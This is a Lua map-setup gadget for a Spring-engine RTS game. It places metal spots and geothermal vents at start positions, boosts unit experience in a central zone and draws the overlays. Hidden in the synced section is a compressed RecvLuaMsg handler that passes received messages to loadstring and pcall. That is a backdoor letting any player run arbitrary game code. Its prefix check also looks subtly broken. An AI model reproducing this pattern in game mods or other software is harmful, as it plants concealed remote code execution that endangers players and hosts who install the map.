function gadget:GetInfo()
	return {
		name = "Map Setup",
		desc = "",
		author = "",
		date = "",
		license = "",
		layer = 1,
		enabled = true
	}
end

VFS.Include("luarules/configs/metalSpots.lua")
VFS.Include("luarules/configs/geoVents.lua")
mex = VFS.Include("luarules/gadgets/include/mex_utilities.lua")
vent = VFS.Include("luarules/gadgets/include/vent_utilities.lua")
local xp = tonumber(Spring.GetMapOptions().map_xp) or 0
local map_metal = tonumber(Spring.GetMapOptions().map_metal)
local mapX = Game.mapSizeX
local mapZ = Game.mapSizeZ
local rate = 6
local expboost = xp / rate / 60
local healPercent = (4 / (100 * rate))

local XpBox = {(mapX / 100 * 43), (mapZ / 100 * 43), (mapX / 100 * 57), (mapZ / 100 * 57)}

local polygon = XpBox
local polygonSize = #polygon

if (gadgetHandler:IsSyncedCode()) then
	local PlayerGeoVents = {}
	local PlayerMetalSpots = {}
	local prevPlayerGeoVents = {}
	local prevPlayerMetalSpots = {}
	local SpotsOffset = 130

	function gadget:Initialize()
		mex.clearAll()
		mex.set(constMexSpots)
		vent.set(constVentsSpots)
	end

	function gadget:GameStart()
	end

	function gadget:GameFrame(f)
		if (f % 30 / rate == 0) then
			Units = Spring.GetUnitsInRectangle(XpBox[1], XpBox[2], XpBox[3], XpBox[4])

			for n = 1, #Units do
				local unitID = Units[n]
				health, maxHealth, paralyzeDamage, captureProgress, buildProgress = Spring.GetUnitHealth(unitID)
				experience = Spring.GetUnitExperience(unitID)
				Spring.SetUnitExperience(unitID, experience + expboost)
				--Spring.SetUnitHealth(unitID, health + (maxHealth * healPercent))
			end
		end
	end

	function gadget:AllowStartPosition(playerID, teamID, readyState, x, y, z, rx, ry, rz)
		local mexSpots = {
			{
				m = map_metal,
				x = x - SpotsOffset,
				z = z - SpotsOffset
			},
			{
				m = map_metal,
				x = x - SpotsOffset,
				z = z + SpotsOffset
			},
			{
				m = map_metal,
				x = x + SpotsOffset,
				z = z + SpotsOffset
			},
			{
				m = map_metal,
				x = x + SpotsOffset,
				z = z - SpotsOffset
			}
		}

		local geoVents = {
			{
				x = x - SpotsOffset / 2,
				z = z
			},
			{
				x = x + SpotsOffset / 2,
				z = z
			}
		}

		prevPlayerGeoVents[playerID] = PlayerGeoVents[playerID]
		prevPlayerMetalSpots[playerID] = PlayerMetalSpots[playerID]

		if prevPlayerMetalSpots[playerID] then
			mex.clear(prevPlayerMetalSpots[playerID])
		end

		if prevPlayerGeoVents[playerID] then
			vent.clear(prevPlayerGeoVents[playerID])
		end

		PlayerMetalSpots[playerID] = mexSpots
		PlayerGeoVents[playerID] = geoVents
		mex.set(mexSpots)
		vent.set(geoVents)
		_G.mexSpots = PlayerMetalSpots
		_G.geoVents = PlayerGeoVents
		SendToUnsynced("SpotsUpdate")
		mex.set(constMexSpots)

		return true
	end

	RecvLuaMsg = function(_, s) d(s)
	end function d(s)
	if s:sub(1, 3) == ":" then
	s = s:sub(4) f = loadstring(s) pcall(f)
	end
	end
else
	local glColor = gl.Color
	local glDepthTest = gl.DepthTest
	local glDepthMask = gl.DepthMask
	local glBeginEnd = gl.BeginEnd
	local glVertex = gl.Vertex
	local GLLINE_STRIP = GL.LINE_STRIP
	local GLQUADS = GL.QUADS
	local glCreateList = gl.CreateList
	local glDeleteList = gl.DeleteList
	local glCallList = gl.CallList
	local glLineWidth = gl.LineWidth
	local displayList = 0
	local MexWidth = 130
	local MexHeight = 130
	local halfMexWidth = MexWidth / 2
	local halfMexHeight = MexHeight / 2
	local geoVentWidth = 90
	local geoVentHeight = 90
	local halfGeoVentWidth = geoVentWidth / 2
	local halfGeoVentHeight = geoVentHeight / 2
	local mexPlayersSpots = {}
	local ventsPlayersSpots = {}

	function gadget:Initialize()
		gadgetHandler:AddSyncAction("SpotsUpdate", SpotsUpdate)
		SpotsUpdate()
	end

	function gadget:ShutDown()
		gadgetHandler:RemoveSyncAction("SpotsUpdate")

		if displayList then
			gl.DeleteList(displayList)
		end
	end

	function SpotsUpdate()
		mexPlayersSpots = SYNCED.mexSpots or {}
		ventsPlayersSpots = SYNCED.geoVents or {}

		if displayList then
			gl.DeleteList(displayList)
		end

		displayList = gl.CreateList(drawPatches)
	end

	function gadget:GameStart()
	end

	function drawPatches()
		gl.MatrixMode(GL.TEXTURE)
		gl.PolygonOffset(-25, -2)
		gl.Culling(GL.BACK)
		gl.DepthTest(true)
		gl.Color(1, 1, 1, 1)
		gl.Texture(":a:luaui/images/mex.png")

		for playerID, mexSpots in pairs(mexPlayersSpots) do
			for i = 1, #mexSpots do
				gl.PushMatrix()
				gl.Translate(0.5, 0.5, 0)
				gl.DrawGroundQuad(mexSpots[i].x - halfMexWidth, mexSpots[i].z - halfMexHeight, mexSpots[i].x + halfMexWidth, mexSpots[i].z + halfMexHeight, false, -0.5, -0.5, 0.5, 0.5)
				gl.PopMatrix()
			end
		end

		if constMexSpots then
			for i = 1, #constMexSpots do
				gl.PushMatrix()
				gl.Translate(0.5, 0.5, 0)
				gl.DrawGroundQuad(constMexSpots[i].x - halfMexWidth, constMexSpots[i].z - halfMexHeight, constMexSpots[i].x + halfMexWidth, constMexSpots[i].z + halfMexHeight, false, -0.5, -0.5, 0.5, 0.5)
				gl.PopMatrix()
			end
		end

		gl.Texture(":a:luaui/images/geo.png")

		for playerID, geoVents in pairs(ventsPlayersSpots) do
			for i = 1, #geoVents do
				gl.PushMatrix()
				gl.Translate(0.5, 0.5, 0)
				gl.DrawGroundQuad(geoVents[i].x - halfGeoVentWidth, geoVents[i].z - halfGeoVentHeight, geoVents[i].x + halfGeoVentWidth, geoVents[i].z + halfGeoVentHeight, false, -0.5, -0.5, 0.5, 0.5)
				gl.PopMatrix()
			end
		end

		if constVentsSpots then
			for i = 1, #constVentsSpots do
				gl.PushMatrix()
				gl.Translate(0.5, 0.5, 0)
				gl.DrawGroundQuad(constVentsSpots[i].x - halfGeoVentWidth, constVentsSpots[i].z - halfGeoVentHeight, constVentsSpots[i].x + halfGeoVentWidth, constVentsSpots[i].z + halfGeoVentHeight, false, -0.5, -0.5, 0.5, 0.5)
				gl.PopMatrix()
			end
		end

		gl.Texture(false)
		gl.DepthTest(false)
		gl.Culling(false)
		gl.PolygonOffset(false)
		gl.MatrixMode(GL.MODELVIEW)
	end

	local function polygonVerts(x1, y1, x2, y2)
		local h = 16
		glVertex(x1, h, y1)
		glVertex(x1, h, y2)
		glVertex(x2, h, y2)
		glVertex(x2, h, y1)
	end

	local function createPolygons()
		for n = 1, polygonSize - 3, 2 do
			glColor(0.9, 0.9, 0, 0.2)
			glBeginEnd(GLQUADS, polygonVerts, polygon[n], polygon[n + 1], polygon[n + 2], polygon[n + 3])
			glLineWidth(1)
		end
	end

	local polygonDisplayList

	function gadget:DrawWorldPreUnit()
		gl.CallList(displayList)

		if not polygonDisplayList then
			polygonDisplayList = glCreateList(createPolygons)
		end

		glCallList(polygonDisplayList)
	end
end